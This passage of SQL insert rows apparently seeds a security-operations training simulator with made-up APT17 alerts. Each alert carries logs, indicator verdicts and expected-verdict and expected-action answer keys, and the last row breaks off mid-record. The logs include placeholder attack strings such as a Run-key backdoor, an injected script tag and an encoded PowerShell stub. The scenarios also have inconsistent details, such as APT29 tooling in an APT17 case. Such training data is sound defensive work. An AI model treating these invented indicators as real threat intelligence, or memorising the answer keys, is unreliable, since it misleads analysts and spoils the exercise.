(1207, 'Persistence Mechanism Established', 'medium', 'System Logs', 'APT17 established persistence on the compromised system by modifying registry keys and setting up backdoors. This allows them to maintain access even after system reboots. Indicators of compromise include registry changes and the presence of backdoor files.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T13:45:32Z\",\"event_id\":\"4720\",\"host_ip\":\"192.168.1.45\",\"user\":\"compromised_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backdoor\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"attacker_ip\":\"203.0.113.15\"}', '2026-02-07 21:24:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT17 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known APT17 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious filename related to persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account that was compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1208, 'Lateral Movement Detected', 'high', 'User Activity Monitoring', 'Using stolen credentials and insider tools, the attackers begin moving laterally, probing for valuable data and additional systems to compromise.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"target_machine\":\"192.168.1.45\",\"action\":\"Successful Logon\",\"logon_type\":\"Network\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"insider_tools.exe\",\"internal_ip\":\"10.0.0.12\"}', '2026-02-07 21:24:22', '2026-02-19 15:56:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account, potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"insider_tools.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File used for lateral movement within network.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1209, 'Data Exfiltration Attempt Blocked', 'high', 'Data Loss Prevention (DLP) System', 'With a foothold established, APT17 attempts to exfiltrate sensitive data to their command and control servers, but vigilant monitoring raises an alert, providing an opportunity to thwart the data theft.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-05T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_project_data.zip\",\"file_hash\":\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\",\"action\":\"blocked\",\"alert_id\":\"dlp-20231105-0001\"}', '2026-02-07 21:24:22', '2026-02-20 02:08:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 C&C servers\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_project_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive project data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of sensitive file attempted for exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Valid user account involved in activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1210, 'Suspicious Network Traffic Detected', 'high', 'Network Monitoring System', 'APT17 initiated a network scan for web vulnerabilities targeting policy think tanks. The scan resulted in abnormal traffic patterns, triggering this alert.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"destination_port\":80,\"protocol\":\"HTTP\",\"request_method\":\"GET\",\"url\":\"/vulnerabilities/scan\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"status_code\":200,\"response_size\":512,\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"vuln_scan_script.py\"}', '2026-02-07 21:25:01', '2026-02-19 15:55:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server hosting policy think tank resources.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 scanning activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"vuln_scan_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Script used for probing vulnerabilities in web applications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1211, 'JavaScript Injection Detected', 'high', 'Web Application Firewall', 'A sophisticated JavaScript payload was injected into the targeted web pages through a Web Application Firewall. This attack aims to execute malicious JavaScript on visitor browsers, marking the execution phase of a complex attack.', 'Execution', 'T1059.007', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"POST\",\"uri\":\"/index.html\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"injected_script\":\"<script>evilFunction();</script>\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_payload.js\",\"username\":\"compromised_user\"}', '2026-02-07 21:25:01', '2026-02-19 15:54:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with JavaScript injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in injection attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1212, 'Malicious Code Persistence Established', 'high', 'Endpoint Detection and Response', 'APT17 has established persistence on the compromised system by embedding scripts that reload upon system restart. This ensures their uninterrupted access.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T02:14:37Z\",\"host\":\"DESKTOP-9F5G8H2\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"C:\\\\Windows\\\\System32\\\\scriptloader.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_id\":7045,\"event_type\":\"Service Installed\",\"service_name\":\"ScriptLoader\",\"service_filepath\":\"C:\\\\Windows\\\\System32\\\\scriptloader.exe\",\"related_process\":\"svchost.exe\"}', '2026-02-07 21:25:01', '2026-02-19 15:53:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in multiple malware databases associated with persistence techniques.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1213, 'Lateral Movement Detected Across Network', 'high', 'Internal Network Logs', 'An advanced attacker has been detected moving laterally across the network using legitimate credentials. The attacker is targeting sensitive data within the think tank\'s infrastructure.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"event_id\":\"4769\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.0.45\",\"user\":\"compromised_user\",\"action\":\"LogonSuccess\",\"auth_type\":\"Kerberos\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"cmd.exe /c net use \\\\\\\\10.0.0.45\\\\sensitive_share\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_name\":\"APT29_Tool\",\"external_ip\":\"203.0.113.45\"}', '2026-02-07 21:25:01', '2026-02-19 15:56:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, 